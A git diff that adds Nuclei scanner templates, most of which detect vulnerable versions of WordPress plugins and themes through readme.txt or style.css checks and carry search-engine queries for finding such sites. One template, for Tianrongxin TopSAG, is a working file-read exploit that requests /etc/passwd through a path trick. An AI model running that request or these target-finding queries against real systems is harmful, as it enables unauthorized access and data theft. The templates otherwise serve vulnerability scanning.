"wp-content/plugins/plezi/" + google-query: inurl:"/wp-content/plugins/plezi/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,plezi,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/plezi/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "plezi" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/other/post-to-pdf-8ab47ff832f5f5cf5ba543f690973fee.yaml b/poc/other/post-to-pdf-8ab47ff832f5f5cf5ba543f690973fee.yaml new file mode 100644 index 0000000000..c8dd849d4e --- /dev/null +++ b/poc/other/post-to-pdf-8ab47ff832f5f5cf5ba543f690973fee.yaml @@ -0,0 +1,59 @@ +id: post-to-pdf-8ab47ff832f5f5cf5ba543f690973fee + +info: + name: > + Post to Pdf <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2774e66c-2920-4578-9ab8-20d7dfd6bd6d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/post-to-pdf/" + google-query: inurl:"/wp-content/plugins/post-to-pdf/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,post-to-pdf,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-to-pdf/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-to-pdf" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/other/post-types-carousel-slider-c7b7350193feff134087fae14530c8a3.yaml b/poc/other/post-types-carousel-slider-c7b7350193feff134087fae14530c8a3.yaml new file mode 100644 index 0000000000..675f8fc993 --- /dev/null +++ b/poc/other/post-types-carousel-slider-c7b7350193feff134087fae14530c8a3.yaml @@ -0,0 +1,59 @@ +id: post-types-carousel-slider-c7b7350193feff134087fae14530c8a3 + +info: + name: > + Post Carousel & Slider <= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4cc038af-c4c8-4141-bbe3-81bcf0a2bace?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/post-types-carousel-slider/" + google-query: inurl:"/wp-content/plugins/post-types-carousel-slider/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,post-types-carousel-slider,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-types-carousel-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-types-carousel-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file diff --git a/poc/other/posts-and-products-views-6353d59c8166d0c7835a56c9603f6772.yaml b/poc/other/posts-and-products-views-6353d59c8166d0c7835a56c9603f6772.yaml new file mode 100644 index 0000000000..bb4d621469 --- /dev/null +++ b/poc/other/posts-and-products-views-6353d59c8166d0c7835a56c9603f6772.yaml @@ -0,0 +1,59 @@ +id: posts-and-products-views-6353d59c8166d0c7835a56c9603f6772 + +info: + name: > + Posts and Products Views for WooCommerce <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a7e27a6c-8b14-459b-aba2-044f311edf9e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/posts-and-products-views/" + google-query: inurl:"/wp-content/plugins/posts-and-products-views/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,posts-and-products-views,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/posts-and-products-views/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "posts-and-products-views" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1') \ No newline at end of file diff --git a/poc/other/primer-mydata.yaml b/poc/other/primer-mydata.yaml new file mode 100644 index 0000000000..ccc04d6d28 --- /dev/null +++ b/poc/other/primer-mydata.yaml @@ -0,0 +1,59 @@ +id: primer-mydata-375188c0b0a50f100d36b48b3521edda + +info: + name: > + Primer MyData for Woocommerce <= 4.2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aca092cf-9482-468e-8dd4-af04e25bcf33?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/primer-mydata/" + google-query: inurl:"/wp-content/plugins/primer-mydata/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,primer-mydata,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/primer-mydata/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "primer-mydata" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.1') \ No newline at end of file diff --git a/poc/other/products-stock-manager-with-excel.yaml b/poc/other/products-stock-manager-with-excel.yaml new file mode 100644 index 0000000000..a9a16086d0 --- /dev/null +++ b/poc/other/products-stock-manager-with-excel.yaml @@ -0,0 +1,59 @@ +id: products-stock-manager-with-excel-ca4c619b208bcba2a3262a03cfacdba5 + +info: + name: > + PHPSpreadsheet Library < 2.3.0 - XXE Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38f950b7-e3a0-4e05-a8b0-9cc6b6c66b0c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/products-stock-manager-with-excel/" + google-query: inurl:"/wp-content/plugins/products-stock-manager-with-excel/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,products-stock-manager-with-excel,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/products-stock-manager-with-excel/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "products-stock-manager-with-excel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8') \ No newline at end of file diff --git a/poc/other/property-hive-stamp-duty-calculator.yaml b/poc/other/property-hive-stamp-duty-calculator.yaml new file mode 100644 index 0000000000..c9cf55ce6d --- /dev/null +++ b/poc/other/property-hive-stamp-duty-calculator.yaml @@ -0,0 +1,59 @@ +id: property-hive-stamp-duty-calculator-16a9af1f4a5d2ccf56de55248353c80f + +info: + name: > + Property Hive Stamp Duty Calculator <= 1.0.22 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4f52cb6-eccf-4213-ae44-4a3fa738723d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/property-hive-stamp-duty-calculator/" + google-query: inurl:"/wp-content/plugins/property-hive-stamp-duty-calculator/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,property-hive-stamp-duty-calculator,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/property-hive-stamp-duty-calculator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "property-hive-stamp-duty-calculator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.22') \ No newline at end of file diff --git a/poc/other/revy.yaml b/poc/other/revy.yaml new file mode 100644 index 0000000000..1eb832c66b --- /dev/null +++ b/poc/other/revy.yaml @@ -0,0 +1,59 @@ +id: revy-97d9157afa2e36b24297da5e222a765b + +info: + name: > + Revy <= 1.18 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6827dc47-669c-41de-8716-7932ce8e5259?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/revy/" + google-query: inurl:"/wp-content/plugins/revy/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,revy,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/revy/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "revy" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.18') \ No newline at end of file diff --git a/poc/other/rrdevs-for-elementor.yaml b/poc/other/rrdevs-for-elementor.yaml new file mode 100644 index 0000000000..afa6887f94 --- /dev/null +++ b/poc/other/rrdevs-for-elementor.yaml @@ -0,0 +1,59 @@ +id: rrdevs-for-elementor-205fba8fcfa128a4dd45c5c816b0bc58 + +info: + name: > + RRAddons for Elementor <= 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdeb9625-65fa-42bd-9708-7090691aae45?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/rrdevs-for-elementor/" + google-query: inurl:"/wp-content/plugins/rrdevs-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,rrdevs-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rrdevs-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rrdevs-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/other/shortcode-elementor-31466df2cf677a943b18b87d140554bf.yaml b/poc/other/shortcode-elementor-31466df2cf677a943b18b87d140554bf.yaml new file mode 100644 index 0000000000..351ef6b94b --- /dev/null +++ b/poc/other/shortcode-elementor-31466df2cf677a943b18b87d140554bf.yaml @@ -0,0 +1,59 @@ +id: shortcode-elementor-31466df2cf677a943b18b87d140554bf + +info: + name: > + Shortcodes for Elementor <= 1.0.4 - Authenticated (Contributor+) Post Disclosure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5debe121-6373-4b56-8441-f0d4a5920089?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/shortcode-elementor/" + google-query: inurl:"/wp-content/plugins/shortcode-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,shortcode-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/shortcode-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "shortcode-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file diff --git a/poc/other/simple-locator-64cca06d1166ced2ac235d17d2f88e70.yaml b/poc/other/simple-locator-64cca06d1166ced2ac235d17d2f88e70.yaml new file mode 100644 index 0000000000..a08f3c5cfe --- /dev/null +++ b/poc/other/simple-locator-64cca06d1166ced2ac235d17d2f88e70.yaml @@ -0,0 +1,59 @@ +id: simple-locator-64cca06d1166ced2ac235d17d2f88e70 + +info: + name: > + Simple Locator <= 2.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38cb5e43-56d0-40b6-936a-f10f15d2e72f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/simple-locator/" + google-query: inurl:"/wp-content/plugins/simple-locator/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,simple-locator,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.3') \ No newline at end of file diff --git a/poc/other/smart-popup-blaster-38242ca08bf2b38877007cc96b7c92a1.yaml b/poc/other/smart-popup-blaster-38242ca08bf2b38877007cc96b7c92a1.yaml new file mode 100644 index 0000000000..fe4dca72d0 --- /dev/null +++ b/poc/other/smart-popup-blaster-38242ca08bf2b38877007cc96b7c92a1.yaml @@ -0,0 +1,59 @@ +id: smart-popup-blaster-38242ca08bf2b38877007cc96b7c92a1 + +info: + name: > + Smart PopUp Blaster <= 1.4.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/afd7fe73-1f24-4e47-a0c4-5a08662c4dbe?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/smart-popup-blaster/" + google-query: inurl:"/wp-content/plugins/smart-popup-blaster/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,smart-popup-blaster,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smart-popup-blaster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smart-popup-blaster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.3') \ No newline at end of file diff --git a/poc/other/svg-shortcode.yaml b/poc/other/svg-shortcode.yaml new file mode 100644 index 0000000000..3a78232b2d --- /dev/null +++ b/poc/other/svg-shortcode.yaml @@ -0,0 +1,59 @@ +id: svg-shortcode-4fe77db4dce510d7ffe8afd6b30a1e49 + +info: + name: > + SVG Shortcode <= 1.0.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b378256-2d9b-4aad-abfe-fecfc76f0bb4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/svg-shortcode/" + google-query: inurl:"/wp-content/plugins/svg-shortcode/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,svg-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/svg-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "svg-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/other/sweetdate.yaml b/poc/other/sweetdate.yaml new file mode 100644 index 0000000000..a339705be7 --- /dev/null +++ b/poc/other/sweetdate.yaml @@ -0,0 +1,59 @@ +id: sweetdate-e5542b1b90e04f838a674478f1ae9a52 + +info: + name: > + Sweet Date <= 3.7.3 - Unauthenticated Privilege Escalation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8dd34937-7641-4b9c-ba59-c4a1ec95f4cd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/sweetdate/" + google-query: inurl:"/wp-content/themes/sweetdate/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,sweetdate,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/sweetdate/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sweetdate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.3') \ No newline at end of file diff --git a/poc/other/tabs-maker-daf9e2cf38c5806dd492be7fef17b720.yaml b/poc/other/tabs-maker-daf9e2cf38c5806dd492be7fef17b720.yaml new file mode 100644 index 0000000000..89cdddc976 --- /dev/null +++ b/poc/other/tabs-maker-daf9e2cf38c5806dd492be7fef17b720.yaml @@ -0,0 +1,59 @@ +id: tabs-maker-daf9e2cf38c5806dd492be7fef17b720 + +info: + name: > + Tabs Maker <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/284c5646-7728-45bd-9479-483c806ca804?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/tabs-maker/" + google-query: inurl:"/wp-content/plugins/tabs-maker/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,tabs-maker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tabs-maker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tabs-maker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/other/tcbd-popover-cde275ba1470f5ed86bd89d6dd9707b4.yaml b/poc/other/tcbd-popover-cde275ba1470f5ed86bd89d6dd9707b4.yaml new file mode 100644 index 0000000000..f6f7633de0 --- /dev/null +++ b/poc/other/tcbd-popover-cde275ba1470f5ed86bd89d6dd9707b4.yaml @@ -0,0 +1,59 @@ +id: tcbd-popover-cde275ba1470f5ed86bd89d6dd9707b4 + +info: + name: > + TCBD Popover <= 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b08f533-9c74-4be3-99ff-70a3d9b90358?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/tcbd-popover/" + google-query: inurl:"/wp-content/plugins/tcbd-popover/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,tcbd-popover,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tcbd-popover/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tcbd-popover" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2') \ No newline at end of file diff --git a/poc/other/the-permalinker-89aed934f46868a1f2162bc8d7aacc36.yaml b/poc/other/the-permalinker-89aed934f46868a1f2162bc8d7aacc36.yaml new file mode 100644 index 0000000000..52909a2e30 --- /dev/null +++ b/poc/other/the-permalinker-89aed934f46868a1f2162bc8d7aacc36.yaml @@ -0,0 +1,59 @@ +id: the-permalinker-89aed934f46868a1f2162bc8d7aacc36 + +info: + name: > + The Permalinker <= 1.8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d03dbe48-371f-4fb7-8902-a013338ac7d4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/the-permalinker/" + google-query: inurl:"/wp-content/plugins/the-permalinker/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,the-permalinker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/the-permalinker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "the-permalinker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.1') \ No newline at end of file diff --git a/poc/other/themify-store-locator.yaml b/poc/other/themify-store-locator.yaml new file mode 100644 index 0000000000..8300dc1a0e --- /dev/null +++ b/poc/other/themify-store-locator.yaml @@ -0,0 +1,59 @@ +id: themify-store-locator-e1393938516ee9ae32cd5a606ad5b4ae + +info: + name: > + Themify Store Locator <= 1.1.9 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/287abdef-24de-4e1b-a673-59cd37411bf6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/themify-store-locator/" + google-query: inurl:"/wp-content/plugins/themify-store-locator/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,themify-store-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/themify-store-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "themify-store-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.9') \ No newline at end of file diff --git a/poc/other/tianrongxin-TopSAG-download-download.yaml b/poc/other/tianrongxin-TopSAG-download-download.yaml new file mode 100644 index 0000000000..448ff5c3a5 --- /dev/null +++ b/poc/other/tianrongxin-TopSAG-download-download.yaml @@ -0,0 +1,23 @@ +id: tianrongxin-TopSAG-download-downloadfile + +info: + name: tianrongxin-TopSAG-download-downloadfile + author: PokerSec + severity: high + metadata: + fofasearch: header="iam" && server="Apache-Coyote/" + +requests: + - raw: + - |- + GET /iam/download;.login.jsp?filepath=/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 diff --git a/poc/other/tickera-event-ticketing-system-5a3ee1f11c4a6d8e9eba3cf37c043750.yaml b/poc/other/tickera-event-ticketing-system-5a3ee1f11c4a6d8e9eba3cf37c043750.yaml new file mode 100644 index 0000000000..28a2cc21b1 --- /dev/null +++ b/poc/other/tickera-event-ticketing-system-5a3ee1f11c4a6d8e9eba3cf37c043750.yaml @@ -0,0 +1,59 @@ +id: tickera-event-ticketing-system-5a3ee1f11c4a6d8e9eba3cf37c043750 + +info: + name: > + Tickera – WordPress Event Ticketing <= 3.5.4.8 - Unauthenticated Customer Data Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2db29c12-bf8a-4d5a-b12a-6c74b816d5f0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/tickera-event-ticketing-system/" + google-query: inurl:"/wp-content/plugins/tickera-event-ticketing-system/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,tickera-event-ticketing-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tickera-event-ticketing-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tickera-event-ticketing-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.4.8') \ No newline at end of file diff --git a/poc/other/unlock-addons-for-elementor.yaml b/poc/other/unlock-addons-for-elementor.yaml new file mode 100644 index 0000000000..a260d767e5 --- /dev/null +++ b/poc/other/unlock-addons-for-elementor.yaml @@ -0,0 +1,59 @@ +id: unlock-addons-for-elementor-3a1552c6c63a6565750f219a6bc5b9e2 + +info: + name: > + Unlock Addons for Elementor <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/62f1635a-cb94-4c5e-a1f6-90a1eeb38968?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/unlock-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/unlock-addons-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,unlock-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/unlock-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "unlock-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/other/visualmodo-elements-134a8cc9ff775949b36d0becbb4ef51d.yaml b/poc/other/visualmodo-elements-134a8cc9ff775949b36d0becbb4ef51d.yaml new file mode 100644 index 0000000000..8a1b7227d1 --- /dev/null +++ b/poc/other/visualmodo-elements-134a8cc9ff775949b36d0becbb4ef51d.yaml @@ -0,0 +1,59 @@ +id: visualmodo-elements-134a8cc9ff775949b36d0becbb4ef51d + +info: + name: > + Visualmodo Elements <= 1.0.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve 